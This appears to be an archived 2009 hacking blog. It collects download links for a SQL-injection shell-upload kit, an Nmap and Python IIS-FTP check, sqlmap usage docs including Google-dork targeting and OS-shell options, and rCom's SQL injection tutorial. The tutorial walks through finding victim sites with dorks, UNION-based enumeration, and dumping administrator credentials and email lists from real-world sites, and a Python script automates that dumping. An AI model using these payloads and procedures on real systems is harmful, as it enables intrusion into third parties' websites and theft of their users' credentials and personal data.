Tuesday, October 20, 2009

Uploading Shell Through SQL Injection [Into Outfile]

http://rapidshare.com/files/22917340/mysql_into_outfile.rar.html

http://rapidshare.de/files/46569137/mysql_into_outfile.zip.html
Pass: security-shell.ws

Friday, September 4, 2009

Detecting Vulnerable IIS-FTP Hosts Using Nmap

Based on an existing Nmap script, I quickly wrote a new one which performs the following actions:

* Check if anonymous sessions are allowed.
* Check if the detected FTP server is running Microsoft ftpd.
* Check if the MKD (mkdir) command is allowed for that anonymous session (this seems to be required by the exploit).

If all three conditions are met, the script prints a warning. Note that the script only reports servers which could be vulnerable; it does not exploit anything. On the other hand, a server that lets anonymous users create directories is a serious misconfiguration in its own right and should be fixed regardless of the newly discovered vulnerability!
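As an added example (not the author's NSE script, which is linked further down), here are the same three checks written with Python's ftplib so they can be run from any host without Nmap. The anonymous password string and the scratch directory prefix are placeholders; the banner match assumes IIS's default "220 Microsoft FTP Service" greeting, which an administrator can change; and the FakeFTP class is a constructed stand-in so the logic can be exercised offline.

```python
import ftplib
import socket
import uuid


def assess_ftp(ftp):
    """Apply the three checks to a connected ftplib.FTP-compatible object.

    Returns a dict with one entry per check plus 'potentially_vulnerable',
    which is True only when all three hold.  The MKD probe creates a
    randomly named directory and removes it again.
    """
    result = {"microsoft_ftpd": False, "anonymous": False, "mkd": False}

    # IIS greets with "220 Microsoft FTP Service" (Nmap -sV reports it as
    # "Microsoft ftpd").  The banner is configurable, so treat it as a hint.
    result["microsoft_ftpd"] = "microsoft ftp" in ftp.getwelcome().lower()

    try:
        ftp.login("anonymous", "nmap@example.com")  # placeholder password (assumption)
        result["anonymous"] = True
    except ftplib.error_perm:
        result["potentially_vulnerable"] = False
        return result

    scratch = "chk_" + uuid.uuid4().hex[:8]  # placeholder prefix (assumption)
    try:
        ftp.mkd(scratch)
        result["mkd"] = True
        ftp.rmd(scratch)  # leave nothing behind on the target
    except ftplib.error_perm:
        pass

    result["potentially_vulnerable"] = all(
        result[k] for k in ("microsoft_ftpd", "anonymous", "mkd"))
    return result


def scan(host, port=21, timeout=10):
    """Connect to a real host and run assess_ftp; None if the port is closed."""
    ftp = ftplib.FTP()
    try:
        ftp.connect(host, port, timeout=timeout)
    except (OSError, socket.timeout):
        return None
    try:
        return assess_ftp(ftp)
    finally:
        try:
            ftp.quit()
        except Exception:
            ftp.close()


class FakeFTP:
    """Constructed stand-in for an FTP session so the checks run offline."""

    def __init__(self, banner, allow_anonymous, allow_mkd):
        self.banner = banner
        self.allow_anonymous = allow_anonymous
        self.allow_mkd = allow_mkd
        self.dirs = set()  # directories that currently exist on the 'server'

    def getwelcome(self):
        return self.banner

    def login(self, user="anonymous", passwd=""):
        if not self.allow_anonymous:
            raise ftplib.error_perm("530 User cannot log in.")
        return "230 User logged in."

    def mkd(self, name):
        if not self.allow_mkd:
            raise ftplib.error_perm("550 Access is denied.")
        self.dirs.add(name)
        return name

    def rmd(self, name):
        self.dirs.discard(name)
        return "250 RMD command successful."


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(scan(sys.argv[1]))
    else:
        print(assess_ftp(FakeFTP("220 Microsoft FTP Service", True, True)))
```

Run it as `python iisftp_check.py 10.0.0.7` against a host you are authorised to test; with no argument it runs the offline stand-in. Like the NSE script, a positive result only means the three preconditions hold, not that the host is exploitable.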

To use the Nmap script, copy it into your local script repository (something like /usr/local/share/nmap/scripts/) and rebuild your script index:

# nmap --script-updatedb

The script then runs against every detected FTP server when you use the default script set (the “-sC” argument), or you can run only this script (faster):

# nmap -p 21 -sV --script=IIS-FTP 10.0.0.7

Starting Nmap 4.76 ( http://nmap.org ) at 2009-09-01 01:15 CEST
Interesting ports on test-win (10.0.0.7):
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
|_ IIS FTP: IIS Server allow anonymous and mkdir (potentially vulnerable)
Service Info: OS: Windows

The script is available here. Note that it is provided “as is”. It's just a quick hack which worked for me.

Maybe you were not aware of the Nmap scripting capabilities. Feel free to read this small introduction to Nmap scripting.

Reference:
http://blog.rootshell.be/2009/09/01/detecting-vulnerable-iis-ftp-hosts-using-nmap/

Sunday, August 23, 2009

sqlmap 0.7

Consider that the target url is:

http://192.168.1.121/sqlmap/mysql/get_int.php?id=1

Assume that:

http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=1

is the same page as the original one and:

http://192.168.1.121/sqlmap/mysql/get_int.php?id=1+AND+1=2

Usage
$ python sqlmap.py -h

sqlmap/0.7
by Bernardo Damele A. G.

Usage: sqlmap.py [options]

Options:
--version show program's version number and exit
-h, --help show this help message and exit
-v VERBOSE Verbosity level: 0-5 (default 1)

Target:
At least one of these options has to be specified to set the source to
get target urls from.

-u URL, --url=URL Target url
-l LIST Parse targets from Burp or WebScarab logs
-g GOOGLEDORK Process Google dork results as target urls
-c CONFIGFILE Load options from a configuration INI file

Request:
These options can be used to specify how to connect to the target url.

--method=METHOD HTTP method, GET or POST (default GET)
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header
--referer=REFERER HTTP Referer header
--user-agent=AGENT HTTP User-Agent header
-a USERAGENTSFILE Load a random HTTP User-Agent header from file
--headers=HEADERS Extra HTTP headers newline separated
--auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
--auth-cred=ACRED HTTP Authentication credentials (value name:password)
--proxy=PROXY Use a HTTP proxy to connect to the target url
--threads=THREADS Maximum number of concurrent HTTP requests (default 1)
--delay=DELAY Delay in seconds between each HTTP request
--timeout=TIMEOUT Seconds to wait before timeout connection (default 30)
--retries=RETRIES Retries when the connection timeouts (default 3)

Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and how to parse and compare HTTP
responses page content when using the blind SQL injection technique.

-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to this value
--os=OS Force back-end DBMS operating system to this value
--prefix=PREFIX Injection payload prefix string
--postfix=POSTFIX Injection payload postfix string
--string=STRING String to match in page when the query is valid
--regexp=REGEXP Regexp to match in page when the query is valid
--excl-str=ESTRING String to be excluded before comparing page contents
--excl-reg=EREGEXP Matches to be excluded before comparing page contents

Techniques:
These options can be used to test for specific SQL injection technique
or to use one of them to exploit the affected parameter(s) rather than
using the default blind SQL injection technique.

--stacked-test Test for stacked queries (multiple statements) support
--time-test Test for time based blind SQL injection
--time-sec=TIMESEC Seconds to delay the DBMS response (default 5)
--union-test Test for UNION query (inband) SQL injection
--union-tech=UTECH Technique to test for UNION query SQL injection
--union-use Use the UNION query (inband) SQL injection to retrieve
the queries output. No need to go blind

Fingerprint:
-f, --fingerprint Perform an extensive DBMS version fingerprint

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.

-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes (opt -U)
--privileges Enumerate DBMS users privileges (opt -U)
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables (opt -D)
--columns Enumerate DBMS database table columns (req -T opt -D)
--dump Dump DBMS database table entries (req -T, opt -D, -C)
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell

File system access:
These options can be used to access the back-end database management
system underlying file system.

--read-file=RFILE Read a file from the back-end DBMS file system
--write-file=WFILE Write a local file on the back-end DBMS file system
--dest-file=DFILE Back-end DBMS absolute filepath to write to

Operating system access:
This option can be used to access the back-end database management
system underlying operating system.

--os-cmd=OSCMD Execute an operating system command
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an out-of-band shell, meterpreter or VNC
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc User priv escalation by abusing Windows access tokens
--msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory

Miscellaneous:
--eta Display for each output the estimated time of arrival
--update Update sqlmap to the latest stable version
-s SESSIONFILE Save and resume all data retrieved on a session file
--save Save options on a configuration INI file
--batch Never ask for user input, use the default behaviour
--cleanup Clean up the DBMS by sqlmap specific UDF and tables


5.1 Output verbosity

Option: -v

This option sets the verbosity level of output messages. There are six levels. The default level is 1, in which information, warnings, errors and tracebacks, if they occur, are shown. Level 2 also shows debug messages, level 3 also shows HTTP requests with all HTTP headers sent, level 4 also shows HTTP response headers and level 5 also shows HTTP response page content.

Example on a MySQL 5.0.67 target (verbosity level 1):

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1" -v 1

[hh:mm:12] [INFO] testing connection to the target url
[hh:mm:12] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:14] [INFO] url is stable
[hh:mm:14] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[hh:mm:14] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:14] [INFO] testing if GET parameter 'id' is dynamic
[hh:mm:14] [INFO] confirming that GET parameter 'id' is dynamic
[hh:mm:14] [INFO] GET parameter 'id' is dynamic
[hh:mm:14] [INFO] testing sql injection on GET parameter 'id' with 0 parenthesis
[hh:mm:14] [INFO] testing unescaped numeric injection on GET parameter 'id'
[hh:mm:14] [INFO] confirming unescaped numeric injection on GET parameter 'id'
[hh:mm:14] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[hh:mm:14] [INFO] testing for parenthesis on injectable parameter
[hh:mm:14] [INFO] the injectable parameter requires 0 parenthesis
[hh:mm:14] [INFO] testing MySQL
[hh:mm:14] [INFO] query: CONCAT(CHAR(53), CHAR(53))
[hh:mm:14] [INFO] retrieved: 55
[hh:mm:14] [INFO] performed 20 queries in 0 seconds
[hh:mm:14] [INFO] confirming MySQL
[hh:mm:14] [INFO] query: LENGTH(CHAR(53))
[hh:mm:14] [INFO] retrieved: 1
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
[hh:mm:14] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
[hh:mm:14] [INFO] retrieved: 5
[hh:mm:14] [INFO] performed 13 queries in 0 seconds
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0



Option: -u

Run sqlmap against a single target URL.

Example on a MySQL 5.0.67 target:

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/mysql/get_int.php?id=1"

[...]
web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex)
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL >= 5.0.0


Process Google dork results as target urls

Option: -g

It is also possible to test and inject on GET parameters on the results of your Google dork.

This option makes sqlmap negotiate a session cookie with the search engine so that it can perform the search; sqlmap then retrieves the first 100 Google results for the dork expression that carry GET parameters and asks you whether you want to test and inject on each candidate URL.

Example of Google dorking with expression site:yourdomain.com ext:php:

$ python sqlmap.py -g "site:yourdomain.com ext:php" -v 1

[hh:mm:38] [INFO] first request to Google to get the session cookie
[hh:mm:40] [INFO] sqlmap got 65 results for your Google dork expression, 59 of them are
testable hosts
[hh:mm:41] [INFO] sqlmap got a total of 59 targets
[hh:mm:40] [INFO] url 1:
GET http://yourdomain.com/example1.php?foo=12, do you want to test this
url? [y/N/q] n
[hh:mm:43] [INFO] url 2:
GET http://yourdomain.com/example2.php?bar=24, do you want to test this
url? [y/N/q] n
[hh:mm:42] [INFO] url 3:
GET http://thirdlevel.yourdomain.com/news/example3.php?today=483, do you
want to test this url? [y/N/q] y
[hh:mm:44] [INFO] testing url http://thirdlevel.yourdomain.com/news/example3.php?today=483
[hh:mm:45] [INFO] testing if the url is stable, wait a few seconds
[hh:mm:49] [INFO] url is stable
[hh:mm:50] [INFO] testing if GET parameter 'today' is dynamic
[hh:mm:51] [INFO] confirming that GET parameter 'today' is dynamic
[hh:mm:53] [INFO] GET parameter 'today' is dynamic
[hh:mm:54] [INFO] testing sql injection on GET parameter 'today'
[hh:mm:56] [INFO] testing numeric/unescaped injection on GET parameter 'today'
[hh:mm:57] [INFO] confirming numeric/unescaped injection on GET parameter 'today'
[hh:mm:58] [INFO] GET parameter 'today' is numeric/unescaped injectable
[...]


HTTP proxy



Option: --proxy

It is possible to provide the address of an anonymous HTTP proxy through which the HTTP requests to the target URL are sent. The syntax of the proxy value is http://url:port.

Example on a PostgreSQL 8.3.5 target:

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
--proxy "http://192.168.1.47:3128"


[hh:mm:36] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[hh:mm:36] [WARNING] GET parameter 'cat' is not dynamic
[hh:mm:37] [WARNING] the back-end DMBS is not MySQL
[hh:mm:37] [WARNING] the back-end DMBS is not Oracle
back-end DBMS: PostgreSQL

Instead of relaying through a single anonymous HTTP proxy server, you can configure a Tor client together with Privoxy on your machine as explained in the Tor client guide, then run sqlmap as follows:

$ python sqlmap.py -u "http://192.168.1.121/sqlmap/pgsql/get_int.php?id=1" \
--proxy "http://192.168.1.47:8118"

Note that 8118 is the default Privoxy port, adapt it to your settings.

http://sqlmap.sourceforge.net/doc/README.html

Tuesday, July 14, 2009

rCom's SQLi Tutorial { reMix }

Contents At A Glance:

1. Introduction(Kinda Pointless)
2. Finding Vulnerable Sites.
3. Getting Number of Columns.
4. Getting MySQL Version.
5. Getting Database Names.
6. Getting Database User.
7. Getting Table Names.
8. Getting Column Names.
9. LIMIT, What is it and why do I need to know it?
10. End Notes

1. Introduction(Kinda Pointless)
First, if you find that I have written something that is wrong, please address it and I will fix it. There is one simple reason why I am writing this paper, mainly because there are so many simple SQL Injection questions that flood this board everyday and people just simple say things like “Learn to use the search function.”, “Google is your friend”, or some other just completely non-helpful remarks. If you aren't going to help someone why reply at all? Just go on to another thread. That doesn't even bring up the number of private messages that I receive daily with questions related to SQL Injection, on a slow day I receive 1-2 private messages, on a normal day I will get up to 10 with questions about SQL, or even “What is your MSN/Yahoo/AIM/E-Mail, I need help.” Most of the time I do try to help as much as I can, but it does get old too. Well, enough ranting here goes.

2. Finding Vulnerable Sites
First you need to know what makes a site vulnerable to SQL Injection before you can find and vulnerable sites.

The most common reason a site is vulnerable to SQL Injection is that the developer builds the query by pasting user input straight into the SQL string. PHP's mysql_real_escape_string() is the usual half-fix: it escapes (it does not remove) characters such as ' and \ so they cannot terminate a quoted string, which stops the classic ' or 1='1 username/password bypass. It does nothing for a numeric parameter like id=1 that is used without quotes, which is exactly the case this paper targets; only prepared statements (bound parameters) or strictly casting the value to an integer close that hole. Many administrators also pile on stripslashes() or addslashes(), which changes nothing about that.

Well since I gave you a very basic reason for why certain sites are vulnerable we will move onto finding some vulnerable sites to play with.

When talking about finding sites to inject you will hear the term “dork” a lot. What this refers to is a Google search term targeted at finding vulnerable websites. A “Google dork” uses the built-in Google operators inurl: or allinurl: to search for websites that have certain strings in their URL. An example of a Google dork is inurl:index.php?id=1; entering this into Google returns all of the sites in Google's index with the string index.php?id=1 in their URL, e.g. http://www.example.com/index.php?id=1

Here are some lists of “dorks” to use:
http://www.hackforums.net/showthread.php?tid=76925
http://www.hackforums.net/showthread.php?tid=71313
http://go-blog.web.id/?p=3
http://sql-injection-tools.blogspot.com/...hafiq.html

Now that we know what a Google dork is we can start finding vulnerable sites. To be vulnerable in the way this paper covers, the site has to have a GET parameter in the URL: index.php?id=1. The id=1 part is the GET parameter; the script plugs that 1 into the WHERE clause of its query to fetch record 1 from the database (Understand? Good.)

So you are going to go to http://www.google.com, http://www.blackle.com, or http://www.dogpile.com and search for your selected dork. When you get your list you can start checking for vulnerabilities. The most common way is to add a single quote (') after one of the integers in the URL:
Example: http://www.example.com/index.php?id=1'

Now there are many ways for a site to show you that it is vulnerable the most common are errors:
You have an error in your SQL Syntax
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():

If you receive any of these errors when you enter the ' after the number then chances are the site is vulnerable to SQL Injection to some extent. That isn't the only sign, though: the most overlooked one is when a main part of the site simply disappears, such as a news article or a body of text on the main page. If this happens the site is likely vulnerable as well.

3. Getting Number of Columns
After you find your vulnerable site the first step is to find the number of columns in the SELECT the page runs. There are a couple of ways people do this; personally I use the ORDER BY statement. GROUP BY with a column number works the same way, ORDER BY is just habit. A lot of people put AND 1=0 in front of their queries; most of the time this is a waste of typing. The only time you need it is when ORDER BY 300-- doesn't error, then you add AND 1=0 to the query.

To find the number of columns you start with ORDER BY 1. If it doesn't error you are good to go; sometimes you will get a syntax error even on ORDER BY 1, which is why it is important to start there, and in that case your best bet is to move on to another site. If you don't get an error I always go to ORDER BY 300 to see if I get an error there. Sometimes you could go on for years and never get an error; a page's SELECT practically never returns 300 columns, so you should always get an error. After getting the error on 300 it is up to you how you find the number of columns (each ORDER BY n that errors means the query has fewer than n columns, each one that doesn't means it has at least n); personally I jump around out of habit, I usually do something like this:
Code:
http://www.example.com/index.php?id=1 ORDER BY 1--
no error
http://www.example.com/index.php?id=1 ORDER BY 300--
error
http://www.example.com/index.php?id=1 ORDER BY 10--
error
http://www.example.com/index.php?id=1 ORDER BY 5--
no error
http://www.example.com/index.php?id=1 ORDER BY 6--
error
After this you know that your website has 5 columns because it errors on everything above ORDER BY 5 and doesn't error on ORDER BY 5 or anything below it.

Note on comments: comments are not always necessary when injecting a website, although sometimes they are. By comments I am referring to the -- at the end of the URL, which makes MySQL ignore whatever the application appends after your input.
Possible comments to use are --, /*, /**/, or simply nothing at the end. One catch with --: MySQL only treats it as a comment when it is followed by whitespace, so in a URL write it as --+ or -- - (the + is an encoded space); # (sent as %23) works as well.

4. Getting MySQL Version
Now that we have the number of columns you want to get the version of the database you are working on. This is an important step, because with any version lower than 5 you will have to guess table names and column names (information_schema only exists from MySQL 5.0 on). I don't recommend working on a database lower than version 5 for beginners; you should get acquainted with SQL Injection first. Before we can get the version you have to find a visible column number. This is where the Injection part really starts. To do this you will use a SELECT statement and the UNION operator. Most people don't understand that these are two different things: UNION glues the result of a second SELECT onto the first, and the reason you write UNION SELECT is that you are already SELECTing from the database when you simply visit the site.
For example: http://www.example.com/index.php?id=1
What this URL is telling the database is SELECT * FROM tablenamehere WHERE id=1;

Now when we add our UNION into that URL we are combining the results of two SELECTs. Since our example website has 5 columns, and a UNION requires both SELECTs to return the same number of columns, this is what our query would look like:

http://www.example.com/index.php?id=1+UNION+SELECT+1,2,3,4,5--

The website should return normally after doing this. If it doesn't and it tells you something like “Forbidden” or some other error, then something in front of the site (usually a web application firewall) is filtering union statements and you need to move on. If it doesn't error, add a negative sign after the equals sign like this:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,2,3,4,5--

There is a reason for this, people; I've been asked many times why you do this. When you send this query to the database you are sending something like:
SELECT * FROM tablenamehere WHERE id=-1 UNION SELECT 1,2,3,4,5

There isn't a -1 in the id column, so the first SELECT returns no rows and the page has nothing of its own to show; the row from our second SELECT takes its place and the numbers appear wherever the page prints the corresponding column. Those are our visible columns. For our example we'll say we got back the numbers 2 and 3, so these are the columns we can retrieve data through. To get the database version there are two ways, either @@version or version(). To use them do this:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,@@version,3,4,5--
or
http://www.example.com/index.php?id=-1+UNION+SELECT+1,concat(version()),3,4,5--

If you get an error like “Illegal mix of collations” when using @@version you simply have to convert it to latin1 from UTF-8 like so:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,convert(@@version using latin1),3,4,5--

NOTE: Notice that we completely replace the number 2 with our query; something like union select 1,concat(version()),2,3,4,5-- has six columns against the site's five and will not work.

If it worked you now know the version of the MySQL database in use. You will see something like 5.0.13-log or 4.0.0.1-delta; there are countless versions and types but all we need to focus on is the first number. If it is 5 we are good to go; if it is 4 and you are new you should move on.

5. Getting Database Names
I haven't seen this covered in any papers on SQL Injection so I will include it because it is an important part of SQL Injection. Novice injectors: ever started on a website and found no useful data such as usernames/passwords? Most likely the database the site currently uses only holds data like news articles. This is where getting the other database names matters. In MySQL 5.0 and later there is always a database named 'information_schema' and often one named 'test'; neither holds data you will need, but information_schema is the reason injecting 5.x databases is so easy: it lists every database, table and column the current user can see.

To get list of databases do this:

http://www.example.com/index.php?id=-1+UNION+SELECT+1,group_concat(schema_name),3,4,5+FROM+information_schema.schemata--
Now where you saw the database version pop up earlier you will see the names of all of the different databases we will say for our example we got back something like this:
information_schema,exampledb,exampledb2,test

To see which database is in use right now:
Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,concat(database()),3,4,5--
We'll say we got back 'exampledb'.

From now on it is a good idea to have a text editor open like notepad/gEdit to save this information for later use. I always have notepad open when I am injecting a site, with a template like this:

Databases:


Tables:


Columns:

So that I can quickly copy and paste in. In my opinion this is a good habit to get into.

6. Getting Database User
Not really necessary, but good to know; use user():
Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,concat(user()),3,4,5--

7. Getting Table Names
I'm going to go a little more in-depth than most tutorials you'll see on the internet here because they aren't very thorough, most will just tell you how to get the tables of the current database but I am going to show you how to get table names from selected databases.

To get the table names of the current database:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4,5 from information_schema.tables WHERE table_schema=database()--

You will see a list of table names come out, for our example we will say we got:
news, images, ads, links

Wow, that looks useful huh? That is information we could get from just looking at the website, so now it's time to get the tables from the other database we found earlier, 'exampledb2'. This is where your best friend the hex converter comes in handy. To name a different database you would normally write table_schema='exampledb2', but the quotes are exactly the characters that magic_quotes_gpc or addslashes() escape, so the trick is to send the name as a hex string literal instead, which needs no quotes at all.
So we convert exampledb2 to 6578616d706c65646232. Always remember to add the 0x in front of the hex to tell MySQL that it is a hex literal; the string it decodes to is compared just like a quoted name. So our database name ends up being 0x6578616d706c65646232.

Online text-to-hex converters:
http://www.motobit.com/util/binary-file-...string.asp
http://www.string-functions.com/string-hex.aspx
http://home2.paulschou.net/tools/xlate/

Now for the query:

http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=0x6578616d706c65646232--
Notice we change 'database()' to our hexed database name '0x6578616d706c65646232'

For our example we'll say we got back:
newsletter, members, administrators

That's the good stuff, normally you wouldn't have found this information and just moved onto another site.

8. Getting Column Names
This is exactly like getting table names you just change table_name to column_name and information_schema.tables to information_schema.columns:

http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4,5 FROM information_schema.columns WHERE table_schema=database()--

That's going to give you every column name in the current database, but you don't want the columns from 'exampledb' (remember, there wasn't any useful info in there); you want just the column names from 'exampledb2' because the member and admin info lives in that database. So open your text-to-hex converter again and hex the database name, so 'exampledb2' becomes 0x6578616d706c65646232:

Code:
http://www.example.com/index.php?id=-1 UNION SELECT 1,group_concat(column_name),3,4,5 from information_schema.columns WHERE table_schema=0x6578616d706c65646232--
That will only return the column names from that selected database. We'll say we got back:
email, username, password, first_name, last_name

If you remember the table names from exampledb2, which you should because you always paste into notepad right?, you can get the administrators username, password, email address, and full name.
To get this you would do:
Code:
http://www.example.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password,0x3a,email,0x3a,first_name,0x3a,last_name) ,3,4,5 FROM exampledb2.administrators--

0x3a is the hex value for a colon ':' so that you can easily separate the fields. Note that hex only works where MySQL expects a string value: in a WHERE comparison, as a group_concat() separator, in the middle of concat(), and so on. It does not work for identifiers. A query such as
Code:
http://www.example.com/index.php?id=-1 union select 1,group_concat(username,0x3a,password),3,4,5 from 0x6578616d706c656462322e61646d696e6973747261746f7273--
(the hex of exampledb2.administrators) is a syntax error, because a table name must be written as an identifier, not as a string literal. If the plain name doesn't work, qualify it with the database as above (exampledb2.administrators) or wrap it in back-ticks; hex-encoding the table name is a myth that circulates in these tutorials.

9. LIMIT What is it and why do I need to know it?
Ever found a database that is full of users/emails/anything else that you want but can't get it all because the website just wont display them all at one go? Well, this is where you need the LIMIT statement.

For our example we will say we want the emails from the exampledb2.newsletter table. The only column in that table is 'email'; it will probably never be that easy, but hey, this is an example right? There are 500 emails in this table and when we group_concat(email) from it we only get back 20 results and a 21st cut off halfway like random.douchebag@gma. The cut-off is not the website's doing: group_concat() output is capped by the MySQL variable group_concat_max_len, 1024 bytes by default, and everything past that is silently dropped. So how do we get the remaining 480 emails? This is where your perseverance comes into play: if you want them that badly you use the LIMIT statement. LIMIT takes a zero-based offset and a row count, so rows 1 to 20 are offsets 0 to 19 and the cut-off 21st row is offset 20, which is where we start:

Code:
http://www.example.com/index.php?id=-1 union select 1,concat(email),3,4,5 from exampledb2.newsletter limit 20,1--

Note when using limit: don't combine it with group_concat(). It won't error, but group_concat() collapses everything into a single row, so any offset other than 0 returns nothing. Use concat() or the plain column name instead, one row per request.

Then increase the offset by 1 until you get an error or just a blank area where the email addresses have been popping up. Ex: limit 21,1--, limit 22,1--, limit 23,1--
Yes, it will take a long time to do this; there are tools to dump databases though, the most commonly used being SQLI Helper, though this tool is flawed too because it won't increase the last number when limiting if needed.
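Sections 3, 4 and 9 above form one procedure: count the columns with ORDER BY, find the visible ones with UNION SELECT, then pull rows out one at a time with LIMIT. The block below is an added example, not rCom's, that drives those steps against a deliberately vulnerable lookup function backed by an in-memory SQLite database. SQLite is a stand-in for MySQL (assumption): ORDER BY n, UNION SELECT, -- comments and LIMIT offset,count behave the same, while information_schema and 0x hex literals do not exist in SQLite, so sections 5 to 8 are not reproduced. The column count is found by binary search rather than by jumping around by hand, and the hardened safe_page() shows why a bound parameter ends the whole game. The news and newsletter tables, their column layout and the email data are constructed.

```python
import re
import sqlite3

# Constructed stand-in for the example site (SQLite in place of MySQL).
DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE news(id INTEGER, title TEXT, body TEXT, author TEXT, posted TEXT);
INSERT INTO news VALUES (1, 'Welcome', 'First post', 'alice', '2009-07-14');
CREATE TABLE newsletter(email TEXT);
""")
DB.executemany("INSERT INTO newsletter VALUES (?)",
               [(f"user{i}@example.com",) for i in range(25)])


def vulnerable_page(id_param):
    """index.php?id=... with the parameter pasted into the query.  Only the
    title and body columns reach the HTML (the tutorial's 'visible' 2 and 3).
    Returns None on a SQL error, which the real site shows as a MySQL warning."""
    sql = f"SELECT id, title, body, author, posted FROM news WHERE id={id_param}"
    try:
        rows = DB.execute(sql).fetchall()
    except sqlite3.Error:
        return None
    return "\n".join(f"TITLE: {r[1]}\nBODY: {r[2]}" for r in rows)


def safe_page(id_param):
    """The fix: the value is bound, never parsed as SQL, so ORDER BY / UNION
    inside the parameter simply match no row instead of changing the query."""
    return DB.execute("SELECT id, title, body, author, posted FROM news WHERE id=?",
                      (id_param,)).fetchall()


def find_column_count(page, upper=300):
    """Section 3 as a binary search: ORDER BY n errors once n exceeds the
    number of columns.  Invariant: lo never errors, hi always does."""
    if page("1 ORDER BY 1--") is None:
        raise ValueError("ORDER BY 1 errors: wrong injection point or comment style")
    if page(f"1 ORDER BY {upper}--") is not None:
        raise ValueError(f"ORDER BY {upper} did not error: parameter may not be injectable")
    lo, hi = 1, upper
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if page(f"1 ORDER BY {mid}--") is None:
            hi = mid
        else:
            lo = mid
    return lo


def find_visible_columns(page, ncols):
    """Section 4: id=-1 empties the real SELECT, so the UNION row of marker
    numbers is what gets rendered; the markers that show up are usable."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    html = page(f"-1 UNION SELECT {markers}--") or ""
    return [i for i in range(1, ncols + 1) if re.search(rf"\b{i}\b", html)]


def dump_column(page, ncols, table, column, slot=2, max_rows=100000):
    """Section 9 with a zero-based offset: LIMIT offset,1 returns one row per
    request through visible column `slot` (rendered as the TITLE line); stop
    at the first empty page.  No group_concat, so group_concat_max_len never
    truncates anything."""
    values = []
    for offset in range(max_rows):
        cols = [str(i) for i in range(1, ncols + 1)]
        cols[slot - 1] = column
        html = page(f"-1 UNION SELECT {','.join(cols)} FROM {table} LIMIT {offset},1--")
        if not html:
            break
        values.append(re.search(r"^TITLE: (.*)$", html, re.M).group(1))
    return values


if __name__ == "__main__":
    n = find_column_count(vulnerable_page)
    print("columns:", n, "visible:", find_visible_columns(vulnerable_page, n))
    print(dump_column(vulnerable_page, n, "newsletter", "email"))
    print("safe page with ORDER BY 300 in the parameter:", safe_page("1 ORDER BY 300--"))
```

Against a real site `page` would be an HTTP GET and the parsing would target whatever HTML element the visible column lands in; the probing logic is unchanged. The binary search needs about nine requests to settle on 5 columns from an upper bound of 300, against the dozens the hand-jumping approach can take.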

10. End Notes
Well, that's it. I do hope that I helped at least a few of you. I know it was a long read for those of you that actually went through it all, but I think at least half of the people who read this will learn something new. On another note SQL Injection can be fun to do, defacing websites even more fun sometimes, but you need to know that it is illegal. Here are some things to keep in mind.
[quote]
Hacking is covered under law Title 18: Crimes and Criminal Procedure: Part 1: Crimes: Chapter 47: Fraud and False Statements: Section 1030: Fraud and related activity in connection with computers. The federal punishment for hacking into computers ranges from a fine or imprisonment for no more than one year to a fine and imprisonment for no more than twenty years. This wide range of punishment depends upon the seriousness of the criminal activity and what damage the hacker has done.
[/quote]

The Ten Commandments of Computer Ethics by the Computer Ethics Institute:
1. Thou shalt not use a computer to harm other people.
2. Thou shalt not interfere with other people's computer work.
3. Thou shalt not snoop around in other people's computer files.
4. Thou shalt not use a computer to steal.
5. Thou shalt not use a computer to bear false witness.
